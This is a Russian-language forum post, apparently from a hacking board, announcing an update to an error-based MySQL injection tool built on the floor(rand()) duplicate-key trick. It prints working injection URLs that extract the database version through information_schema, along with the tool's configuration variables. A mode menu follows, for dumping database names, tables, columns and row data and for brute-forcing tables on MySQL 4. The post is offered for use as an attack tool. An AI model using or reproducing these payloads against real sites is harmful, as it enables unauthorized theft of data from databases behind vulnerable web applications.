update:
MySql inj floor(rand()):
Названо просто от балды, еще одна альтернатива Blind Mysql injection, но уже для 4.1<=Mysql=>5, т.к. использует стандартные функции для старых версий (можно сказать альтернатива name_const), основано на вызове той же ошибки Duplicate
- Многопоточный
- Post/Get/Cookies/Proxy & etc.
- Все те же возможности, что и при обычной скуле +
та же скорость
скуля:
Код:
http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
$f_url = "http://example.com/?id=1+or(1,2)="; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "--+"; # close SQL
PS: Приведу еще один пример, некоторые просто не вполне понимают возможности:
скуля:
Код:
http://example.com/?id=(select+1+from+(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)a)--+
переменные в скрипте:
Код:
$f_table = "information_schema.tables"; # default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
$f_url = "http://example.com/?id=(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+"; # close SQL
[1] floor(rand()) - system information\n";
[2] floor(rand()) - get DB-names from information_schema.schemata\n";
[3] floor(rand()) - get tables from DB-name\n";
[4] floor(rand()) - get column_name from tables from DB-name\n";
[5] floor(rand()) - get tables from information_schema (current DB)\n";
[6] floor(rand()) - get column_name from table (current DB)\n";
[7] floor(rand()) - get data from columns\n";
[8] floor(rand()) - Mysql4 inj brute tables and columns\n";
теперь с blind mysql4 можно работать как с обычной скулей
Обновления в первом посте темы как обычно
PS: + исправление мелких багов
update 28.02.2010 - фикс багов